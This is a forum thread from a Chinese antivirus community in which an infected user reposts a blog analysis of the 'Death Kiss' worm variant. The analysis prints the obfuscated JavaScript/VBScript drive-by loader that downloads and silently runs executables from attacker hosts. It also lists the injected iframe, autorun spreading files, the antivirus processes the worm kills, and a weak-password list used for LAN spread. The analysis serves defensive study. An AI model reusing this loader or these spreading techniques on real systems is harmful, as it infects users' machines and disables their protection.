收藏本站 |切换到宽版 | 更换论坛皮肤
 找回密码  忘记邮箱  QQ快速登录  快速登录  快速注册

卡饭»论坛 安全区 原创工具区 ==>>中招了,死神之吻==>>
返回列表 发新帖
查看: 3003|回复: 2
收起左侧

==>>中招了,死神之吻==>>

[复制链接]
wp310
头像被屏蔽
发表于 2007-3-11 09:32:28 | 显示全部楼层 |阅读模式
又是女人... ...非得找什么什么破玩意儿!昨天,中招了,死神的变种——死神之吻。好在卡巴一直开着,下载了几个病毒文件,但是没下全,所以一直没有发作。
      百度一下,找到了一片帖子,说得很详尽,供大家参考。可惜我不懂编程,不知道怎么杀了这个狗娘养的病毒!

      原帖地址:http://hi.baidu.com/mopery/blog/item/9f19bb01baad97061c958343.html

      转帖如下:

死神之吻 分析!终于等到了这个的变种..
2007-03-08 23:15
样本来源
http://forum.ikaka.com/topic.asp?board=28&artid=8279815

以前写过这个病毒的一个版本
http://forum.ikaka.com/topic.asp?board=28&artid=8261614

从网页一直分析到病毒为止,开工!

猫叔 提到的那个帖子的网址 已经解密
<script src=http://www.17tc.com/pop.js></script>

跳转
http://www.17tc.com/pop.htm

代码入下
<script>var url,kiss;url="http://a.2007ip.com/*****.exe";kiss="C:\\windows\\gggg.exe";try{var ado=(document.createElement("object"));ado.setAttribute("classid","clsid:BD96C556-65A3-11D0-983A-00C04FC29E36");var xml=ado.CreateObject("Microsoft.X"+"M"+"L"+"H"+"T"+"T"+"P","");var as=ado.createobject("Adodb.Stream","");xml.Open("GET",url,0);xml.Send();as.type=1;as.open();as.write(xml.responseBody);as.savetofile(kiss,2);var shell=ado.createobject("Shell.Application","");shell.Shell(pa222th,"","","open",0);}catch(e){};</script>
<script language="VBScript">
on error resume next
j1="clsid:":j2="BD96C556-":j3="65A3-":j4="11D0-":j5="983A-":j6="00C04FC29E36"
j7=j1&j2&j3&j4&j5&j6
Set df = document.createElement("object")
df.setAttribute "classid", j7
b4="Mi":b5="cr":b6="o":b7="soft":b8=".X":b9="M":b10="L":b11="H":b12="T":b13="T":b14="P"
strb=b4&b5&b6&b7&b8&b9&b10&b11&b12&b13&b14
Set x = df.CreateObject(strb,"")

dl = "http://a.2007ip.com/yt.vbs"
:fname1="yt.vbs"
z1="She":z2="ll.A":z3="ppli":z4="cat":z5="io":z6="n"
zz=z1&z2&z3&z4&z5&z6
sub shellexe(zz,fname1)
set Q = df.createobject(zz,""):Q.ShellExecute fname1,"","","open",0
end sub
a4="A":a5="d":a6="o":a7="d":a8="b":a9=".":a10="S":a11="t":a12="r":a13="e":a14="a":a15="m"
strd=a4&a5&a6&a7&a8&a9&a10&a11&a12&a13&a14&a15
set SS = df.createobject(strd,"")
SS.type = 1
f4="G":f5="E":f6="T"
stre=f4&f5&f6

x.Open stre, dl, False
x.Send
SS.close
set F = df.createobject("Scripting.FileSystemObject","")
tmp2=2
set tmp = F.GetSpecialFolder(tmp2)
SS.open
fname1= F.Buildkiss(tmp,fname1)
SS.write x.responseBody
SS.savetofile fname1,2
call shellexe(zz,fname1)
</script>

C:\\windows\\gggg.exe
这个就是 死神之吻 的主体..

就以前的死神 与 这个死神 相比..有所增强..但是bug 多如大米..

样本编写语言:Borland Delphi 6.0 - 7.0
加壳方式:DWing的Upack

释放文件
C:\WINDOWS\system32\Death.SiShen
C:\WINDOWS\system32\spoolsv.exe
C:\pass.dic
F:\1.ico

C:\WINDOWS\system32\Death.SiShen
内容为
[Autorun]
OPEN=Death.exe
shellexecute=Death.exe
shell\Auto\command=Death.exe

创建启动项
[software\microsoft\windows\currentversion\run]
什么都没写入..

修改 显示文件和文件夹 注册表
[HKLM\software\microsoft\windows\currentversion\explorer\advanced\folder\hidden\showall]
"checkedvalue"=dword:00000000

所有根目录及移动存储生成
X:\autorun.inf
X:\death.exe
[autorun]
\n\nopen=death.exe
\n\nshellexecute=death.exe
\n\nshell\auto\command=death.exe

尝试关闭窗口
symantec antivirus 企业版
江民杀毒软件 kv2006:实时监视
ravmonclass
tflockdownmain
zonealarm
zaframewnd
天网防火墙个人版
tapplication
天网防火墙企业版
tapplication
virusscan
symantec antivirus
duba
wrapped gift killer
icesword
pjf(ustc)
防火墙
tform1
噬菌体
木马克星

尝试关闭进程
eghost.exe
mailmon.exe
kavpfw.exe
iparmor.exe
_avp32.exe
_avpcc.exe
_avpm.exe
avp32.exe
avpcc.exe
avpm.exe
avp.exe
navapw32.exe
navw32.exe
nod32kui.exe
nod32kru.exe
pfw.exe
kfw.exe
kavpfw.exe
vsmon.exe
mcshield.exe
vstskmgr.exe
naprdmgr.exe
updaterui.exe
tbmon.exe
scan32.exe
ravmond.exe
ccenter.exe
ravtask.exe
ravmon.exe
ravstub.exe
kvxp.kxp
kvmonxp.kxp
kvcenter.kxp
kvsrvxp.exe
kregex.exe
uihost.exe
trojdie.kxp
360safe.exe
360tray.kxp
frogagent.exe
logo1_.exe
logo_1.exe
rundl132.exe
fyfirewall.exe

修改系统进程内存
C:\WINDOWS\system32\winlogon.exe

搜索感染除系统盘以外的 .exe/.scr/.com/.pif/.htm/.html/.asp/.php/.jsp/.aspx 文件

(.exe/.scr/.com/.pif/)上个分析里的死神 是替换 文件..这个版本改为与"熊猫烧香"相同的方法 捆绑

感染的 .htm/.html/.asp/.php/.jsp/.aspx 文件 在尾部加入
<iframe src=http://if.iloveck.com/test/test.htm width=0 height=0></iframe>

访问网络下载其他病毒
http://a.2007ip.com/****/01.exe
~
http://a.2007ip.com/****/10.exe

保存到 c:\1.exe ~ c:\10.exe

利用弱口令访问区域内计算机传播(death.exe)

c:\pass.dic
内容为

%null%
%username%
!@#$
!@#$%
!@#$%^
!@#$%^&
!@#$%^&*
000000
00000000
0123456789
huaxia
1
101010
111
111111
1111111
11111111
1111111111
111222
112233
11223344
121212
12121212
123
123123
123321
1234
12344321
12345
123456
1234567
12345678
123456789
1234567890
1234qwer
123abc
123go
1313
131313
1314520
147258
168168
1p2o3i
1q2w3e
1qaz2wsx
2222
222222
2222222
22222222
31415926
333333
369
4444
520
5201314
520520
54321
5555
555555
55555555
5683
654321
666666
666888
7758521
7758258
777
7777
777777
7777777
77777777
789456
790119
80486
888888
88888888
888999
960628
987654
987654321
999999
99999999
999999999
@#$%^&
a
aaa
aaaaaa
abc
abc123
abcd
abcd1234
abcde
abcdef
abcdefg
access
action
active

一大堆 字数 原因不列了..

F:\1.ico 为感染后的 .exe/.scr/.com/.pif 图标..


HcCSBoy
别在写这无聊的玩意了..
估计是无法完全达到熊猫效果的..
搞个统计流量的没用的.. 多此一举..



[ 本帖最后由 wp310 于 2007-3-11 09:53 编辑 ]
回复

举报

CL7
发表于 2007-3-11 11:05:38 | 显示全部楼层
用新的SERng2试试,修复之后再用卡巴扫全盘吧
应该可以了
回复

举报

30M320
头像被屏蔽
发表于 2007-3-11 13:25:35 | 显示全部楼层
同情一下!!~~~
回复

举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2025-3-17 12:29 , Processed in 0.133944 second(s), 18 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表